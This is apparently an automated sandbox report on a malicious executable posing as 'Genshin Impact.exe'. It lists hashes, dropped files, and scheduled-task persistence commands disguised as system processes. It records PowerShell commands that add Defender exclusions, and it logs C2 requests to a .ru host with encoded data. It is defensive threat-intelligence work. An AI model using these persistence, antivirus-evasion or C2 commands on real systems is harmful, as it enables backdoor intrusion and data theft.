| File name: | Genshin Impact.exe |
| Full analysis: | https://app.any.run/tasks/b96f80ce-2088-462b-86e3-d1001ce956ae |
| Verdict: | Malicious activity |
| Threats: | A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices. |
| Analysis date: | February 15, 2024, 03:03:52 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows |
| MD5: | B4BB269011C062CB169969258AB0E1B9 |
| SHA1: | 6F17B1266EABFAD46EEE405F8245C604468A52C5 |
| SHA256: | BD1D4E5E6380D4E4C398B3BD1F3BFC20FFA576C004773B1F637FD272B771C125 |
| SSDEEP: | 49152:ZFrKj5GTlv6xRC6cVUSAWuLhg1BEz3pkJTXVbgRdhmq/ZicwR9Jjx6SlzBlqTRtW:ZFrKdQ+RXlWENYTXVbe/ZicwR9tx62B3 |
| .exe | | | Win32 Executable (generic) (52.9) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (23.5) |
| .exe | | | DOS Executable Generic (23.5) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2020:12:01 18:00:55+00:00 |
| ImageFileCharacteristics: | Executable, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 14 |
| CodeSize: | 201216 |
| InitializedDataSize: | 114176 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x1ec40 |
| OSVersion: | 5.1 |
| ImageVersion: | - |
| SubsystemVersion: | 5.1 |
| Subsystem: | Windows GUI |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 120 | "C:\winsessionnet\PortwebSaves.exe" | C:\winsessionnet\PortwebSaves.exe | cmd.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Version: 1.1.1o Modules
| |||||||||||||||
| 696 | schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Prefetch\ReadyBoot\csrss.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 848 | schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'C:\winsessionnet\audiodg.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 880 | "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Migration\WTR\PortwebSaves.exe' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | PortwebSaves.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 956 | schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\winsessionnet\lsass.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 980 | "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winsessionnet\audiodg.exe' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | PortwebSaves.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 1112 | schtasks.exe /create /tn "PortwebSavesP" /sc MINUTE /mo 13 /tr "'C:\Windows\Migration\WTR\PortwebSaves.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1236 | schtasks.exe /create /tn "PortwebSaves" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\PortwebSaves.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1308 | "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winsessionnet\lsass.exe' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | PortwebSaves.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 1336 | "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Prefetch\ReadyBoot\csrss.exe' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | PortwebSaves.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| (PID) Process: | (3216) Genshin Impact.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (3216) Genshin Impact.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (3216) Genshin Impact.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (3216) Genshin Impact.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (2964) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (2964) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (2964) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (2964) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (120) PortwebSaves.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PortwebSaves_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (120) PortwebSaves.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PortwebSaves_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3216 | Genshin Impact.exe | C:\winsessionnet\kudjk2JZBqNfIbV0H.bat | text | |
MD5:B57373910E83F55B01DA9606C160D606 | SHA256:EED136C4973C9C837BA407C3C8DC5D70B9AD30C213628AB93C29649731207065 | |||
| 3216 | Genshin Impact.exe | C:\winsessionnet\PortwebSaves.exe | executable | |
MD5:AD823965FDA5D6901AB6A2BC0E153CEE | SHA256:2C9A19274F314A4F2F728C51DC117196F7C176C6952275E3BA58184A2D6A95D9 | |||
| 120 | PortwebSaves.exe | C:\winsessionnet\audiodg.exe | executable | |
MD5:AD823965FDA5D6901AB6A2BC0E153CEE | SHA256:2C9A19274F314A4F2F728C51DC117196F7C176C6952275E3BA58184A2D6A95D9 | |||
| 120 | PortwebSaves.exe | C:\winsessionnet\6203df4a6bafc7 | text | |
MD5:F7BB6379B4C4646C23C2682E38FC955C | SHA256:D1EA9A815CB299CC9A2E1574C59440DE10BBB4685983B4D20B9062B4AA12CDC1 | |||
| 120 | PortwebSaves.exe | C:\winsessionnet\42af1c969fbb7b | text | |
MD5:5F39B156AD2ED63080CBFD6567ECD6DD | SHA256:FD52455C4EE702202808450010856399A465EC8BDC0B080D8181E30F9B687D7F | |||
| 120 | PortwebSaves.exe | C:\Program Files\PackageManagement\ProviderAssemblies\smss.exe | executable | |
MD5:AD823965FDA5D6901AB6A2BC0E153CEE | SHA256:2C9A19274F314A4F2F728C51DC117196F7C176C6952275E3BA58184A2D6A95D9 | |||
| 120 | PortwebSaves.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\SearchFilterHost.exe | executable | |
MD5:AD823965FDA5D6901AB6A2BC0E153CEE | SHA256:2C9A19274F314A4F2F728C51DC117196F7C176C6952275E3BA58184A2D6A95D9 | |||
| 120 | PortwebSaves.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\617403385cfa57 | text | |
MD5:CF3CA6B4842ACF83955291156A4617D5 | SHA256:8CC881027A8AB0F4DBE159332E0C7D4F0E97CDCDD61174C294B3E68E3CC08406 | |||
| 120 | PortwebSaves.exe | C:\Windows\Migration\WTR\PortwebSaves.exe | executable | |
MD5:AD823965FDA5D6901AB6A2BC0E153CEE | SHA256:2C9A19274F314A4F2F728C51DC117196F7C176C6952275E3BA58184A2D6A95D9 | |||
| 120 | PortwebSaves.exe | C:\Windows\Prefetch\ReadyBoot\886983d96e3d3e | text | |
MD5:4A8311A41DB07AC76B9AF1C44CB0CD11 | SHA256:E3A59567B071079FD87CF65937190252007BEC5E344C7D79CAA4DC162CD1A0EC | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
120 | PortwebSaves.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/line/?fields=hosting | unknown | text | 6 b | unknown |
3876 | lsass.exe | GET | 200 | 104.21.2.8:80 | http://7777.cllt.nyashteam.ru/testwp.php?6bPhi3SxOdYE8hsiboB3F=wIY7vUbsmDZqqYHJQW1NgxK6Jy&cc94e78e3bda1f2269b01e133898fb04=e7fe83161c56c764f6c8620d4945ebb8&fdb24f392670a7714ac24c8e7509952b=QYycjMzMWN3UGZlNjYjFTOkdTNjNTYhhjZhNmY0EDM1AjN1EjZjZjM&6bPhi3SxOdYE8hsiboB3F=wIY7vUbsmDZqqYHJQW1NgxK6Jy | unknown | text | 2.09 Kb | unknown |
3876 | lsass.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/line/?fields=hosting | unknown | text | 6 b | unknown |
3876 | lsass.exe | GET | 200 | 104.21.2.8:80 | http://7777.cllt.nyashteam.ru/testwp.php?YJXgSJi5IdRD=jDrZ&HqhK=8bUm0XqyQKAuQiBIVWFcD5&9462c2628cc06f84cb4d3fb9a992edeb=lFGM0UjM4cjM4I2YwgDM2YDO1ImN4QWMjdzYkBTM0ATO4EzMzEGZhNTN0QDO2ADN1YTNyUDN&fdb24f392670a7714ac24c8e7509952b=QOxQDZ3QTYhJTY3YGOlFGZ3EjNhdDNzITZmVzM3IzNyEGNjJWM0MWM&5e79fff15169b7d3a3fa62efdb306b31=d1nIxMTNlhjNlJGNlNTN5ImNzEzYzQDM0ITM1cDMwkDOzUDNzQDMyMGZyIiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W&4a4a8831cb4723c7f5e3b65ea3eefbf9=d1nIiojI3MWMkBzNjJTYlZTMyIGNmFmMwYTZhNDZ1kTMlRmNykjIsISMzUTZ4YTZiRTZzUTOiZzMxM2M0ADNyETN3ADM5gzM1QzM0AjMjRmMiojIxQTZ5ITM2kTYjVmZzIGMyYWNyQmN2gjZ1MWY3YGNiZjIsICN5EjM3YDN5Q2YwQWNmZTOmVTNyUGOklDNwIWYyYTO0MjZ3IDOwU2NiojI5MmZiNTOhJjY2EDO4ImN5ITZ1EGM4EWN0EzMykTMxQmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJFTNXpFdCNEZ5Z0RkRlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S6FUeaVHbHN2dWdEZUJ0QOhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzZIt0Zvh0UIJkeOVXSElUQCNlVR5URJdXQE5kMwMlTwJ0UL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTtkQ5kGVvFUajxmUINGaSdVUn10MZBHaHNGaKNjUnVEMSdlQDpVeGdkW1Z0RkRlSp9UaVdlYoVTVWFFZrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlWSp9UajVVUVp0QMlWUYF2QClWT6F0QihWNyIGcONzYsplMilnQGl0MBl3YzkzRaVHbyYVavpWS5ZVbWVHbyYVa3NlZpRzVhNnSYp1Q5MlW3lTbjFjVrlkNJNlW1lTblxWMXFGMKNETpFERNdXQE10dJl2Tpd3VZBjTzI2dKNETptmbihWMtNGbkVUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNZRUTwQTeNh3dp5UNFRlT1lEVOl2bqlka5ckYpdXaJZkUrlkNJNVZ5JlbiFTOykVa3lWS1x2RilnVtF1ZR1mYoh3aJZTSpJmdsJjWspkbJNXSpJGc412Ysp0aJZTSTVGMsJTWpdXaJp3YqxkejRVT1FFVNlHNT1ENFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYxQGM3MmMhVmNxIjY0YWYyAjNlF2MkVTOxUGZ2ITOiwiI0UjZ5EWNlBTNmdDZ3AzNmJDZzYDMlRGZ3gTZllDZlZmN1kTOkFWOmJiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W | unknown | text | 104 b | unknown |
3876 | lsass.exe | GET | 200 | 104.21.2.8:80 | http://7777.cllt.nyashteam.ru/testwp.php?YJXgSJi5IdRD=jDrZ&HqhK=8bUm0XqyQKAuQiBIVWFcD5&9462c2628cc06f84cb4d3fb9a992edeb=lFGM0UjM4cjM4I2YwgDM2YDO1ImN4QWMjdzYkBTM0ATO4EzMzEGZhNTN0QDO2ADN1YTNyUDN&fdb24f392670a7714ac24c8e7509952b=QOxQDZ3QTYhJTY3YGOlFGZ3EjNhdDNzITZmVzM3IzNyEGNjJWM0MWM&4a4a8831cb4723c7f5e3b65ea3eefbf9=0VfiIiOiczYxQGM3MmMhVmNxIjY0YWYyAjNlF2MkVTOxUGZ2ITOiwiIyAjYxQmMwIDO4ITNwQWOhJWN3IGZ4EmNmdTZjhjMmRGMxcjN1gDNyIiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W | unknown | text | 2.09 Kb | unknown |
3876 | lsass.exe | GET | 200 | 104.21.2.8:80 | http://7777.cllt.nyashteam.ru/testwp.php?YJXgSJi5IdRD=jDrZ&HqhK=8bUm0XqyQKAuQiBIVWFcD5&9462c2628cc06f84cb4d3fb9a992edeb=lFGM0UjM4cjM4I2YwgDM2YDO1ImN4QWMjdzYkBTM0ATO4EzMzEGZhNTN0QDO2ADN1YTNyUDN&fdb24f392670a7714ac24c8e7509952b=QOxQDZ3QTYhJTY3YGOlFGZ3EjNhdDNzITZmVzM3IzNyEGNjJWM0MWM&e742462fe5d2ee0b9bfd69cf1aa9c77a=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 | unknown | text | 2.09 Kb | unknown |
3876 | lsass.exe | GET | 200 | 104.21.2.8:80 | http://7777.cllt.nyashteam.ru/testwp.php?YJXgSJi5IdRD=jDrZ&HqhK=8bUm0XqyQKAuQiBIVWFcD5&9462c2628cc06f84cb4d3fb9a992edeb=lFGM0UjM4cjM4I2YwgDM2YDO1ImN4QWMjdzYkBTM0ATO4EzMzEGZhNTN0QDO2ADN1YTNyUDN&fdb24f392670a7714ac24c8e7509952b=QOxQDZ3QTYhJTY3YGOlFGZ3EjNhdDNzITZmVzM3IzNyEGNjJWM0MWM&5e79fff15169b7d3a3fa62efdb306b31=d1nIxMTNlhjNlJGNlNTN5ImNzEzYzQDM0ITM1cDMwkDOzUDNzQDMyMGZyIiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W&4a4a8831cb4723c7f5e3b65ea3eefbf9=d1nIiojI3MWMkBzNjJTYlZTMyIGNmFmMwYTZhNDZ1kTMlRmNykjIsISMzUTZ4YTZiRTZzUTOiZzMxM2M0ADNyETN3ADM5gzM1QzM0AjMjRmMiojIxQTZ5ITM2kTYjVmZzIGMyYWNyQmN2gjZ1MWY3YGNiZjIsICN5EjM3YDN5Q2YwQWNmZTOmVTNyUGOklDNwIWYyYTO0MjZ3IDOwU2NiojI5MmZiNTOhJjY2EDO4ImN5ITZ1EGM4EWN0EzMykTMxQmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJFTNXpFdCNEZ5Z0RkRlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S6FUeaVHbHN2dWdEZUJ0QOhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzZIt0Zvh0UIJkeOVXSElUQCNlVR5URJdXQE5kMwMlTwJ0UL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTtkQ5kGVvFUajxmUINGaSdVUn10MZBHaHNGaKNjUnVEMSdlQDpVeGdkW1Z0RkRlSp9UaVdlYoVTVWFFZrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlWSp9UajVVUVp0QMlWUYF2QClWT6F0QihWNyIGcONzYsplMilnQGl0MBl3YzkzRaVHbyYVavpWS5ZVbWVHbyYVa3NlZpRzVhNnSYp1Q5MlW3lTbjFjVrlkNJNlW1lTblxWMXFGMKNETpFERNdXQE10dJl2Tpd3VZBjTzI2dKNETptmbihWMtNGbkVUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNZRUTwQTeNh3dp5UNFRlT1lEVOl2bqlka5ckYpdXaJZkUrlkNJNVZ5JlbiFTOykVa3lWS1x2RilnVtF1ZR1mYoh3aJZTSpJmdsJjWspkbJNXSpJGc412Ysp0aJZTSTVGMsJTWpdXaJp3YqxkejRVT1FFVNlHNT1ENFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYxQGM3MmMhVmNxIjY0YWYyAjNlF2MkVTOxUGZ2ITOiwiI0UjZ5EWNlBTNmdDZ3AzNmJDZzYDMlRGZ3gTZllDZlZmN1kTOkFWOmJiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W | unknown | text | 104 b | unknown |
3876 | lsass.exe | GET | 200 | 104.21.2.8:80 | http://7777.cllt.nyashteam.ru/testwp.php?YJXgSJi5IdRD=jDrZ&HqhK=8bUm0XqyQKAuQiBIVWFcD5&9462c2628cc06f84cb4d3fb9a992edeb=lFGM0UjM4cjM4I2YwgDM2YDO1ImN4QWMjdzYkBTM0ATO4EzMzEGZhNTN0QDO2ADN1YTNyUDN&fdb24f392670a7714ac24c8e7509952b=QOxQDZ3QTYhJTY3YGOlFGZ3EjNhdDNzITZmVzM3IzNyEGNjJWM0MWM&5e79fff15169b7d3a3fa62efdb306b31=d1nIxMTNlhjNlJGNlNTN5ImNzEzYzQDM0ITM1cDMwkDOzUDNzQDMyMGZyIiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2M5EmMiZTM4gjY2kjMlVTYwgTY1QTMzITOxEDZis3W&4a4a8831cb4723c7f5e3b65ea3eefbf9=d1nIiojI3MWMkBzNjJTYlZTMyIGNmFmMwYTZhNDZ1kTMlRmNykjIsISMzUTZ4YTZiRTZzUTOiZzMxM2M0ADNyETN3ADM5gzM1QzM0AjMjRmMiojIxQTZ5ITM2kTYjVmZzIGMyYWNyQmN2gjZ1MWY3YGNiZjIsICN5EjM3YDN5Q2YwQWNmZTOmVTNyUGOklDNwIWYyYTO0MjZ3IDOwU2NiojI5MmZiNTOhJjY2EDO4ImN5ITZ1EGM4EWN0EzMykTMxQmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJFTNXpFdCNEZ5Z0RkRlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S6FUeaVHbHN2dWdEZUJ0QOhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzZIt0Zvh0UIJkeOVXSElUQCNlVR5URJdXQE5kMwMlTwJ0UL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTtkQ5kGVvFUajxmUINGaSdVUn10MZBHaHNGaKNjUnVEMSdlQDpVeGdkW1Z0RkRlSp9UaVdlYoVTVWFFZrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlWSp9UajVVUVp0QMlWUYF2QClWT6F0QihWNyIGcONzYsplMilnQGl0MBl3YzkzRaVHbyYVavpWS5ZVbWVHbyYVa3NlZpRzVhNnSYp1Q5MlW3lTbjFjVrlkNJNlW1lTblxWMXFGMKNETpFERNdXQE10dJl2Tpd3VZBjTzI2dKNETptmbihWMtNGbkVUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNZRUTwQTeNh3dp5UNFRlT1lEVOl2bqlka5ckYpdXaJZkUrlkNJNVZ5JlbiFTOykVa3lWS1x2RilnVtF1ZR1mYoh3aJZTSpJmdsJjWspkbJNXSpJGc412Ysp0aJZTSTVGMsJTWpdXaJp3YqxkejRVT1FFVNlHNT1ENFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYxQGM3MmMhVmNxIjY0YWYyAjNlF2MkVTOxUGZ2ITOiwiI0UjZ5EWNlBTNmdDZ3AzNmJDZzYDMlRGZ3gTZllDZlZmN1kTOkFWOmJiOiEDNlljMxYTOhNWZmNjYwIjZ1IDZ2YDOmVzYhdjZ0ImNiwiI0kTMycjN0kDZjBDZ1YmN5YWN1ITZ4QWO0AjYhJjN5QzMmdjM4ATZ3IiOikzYmJ2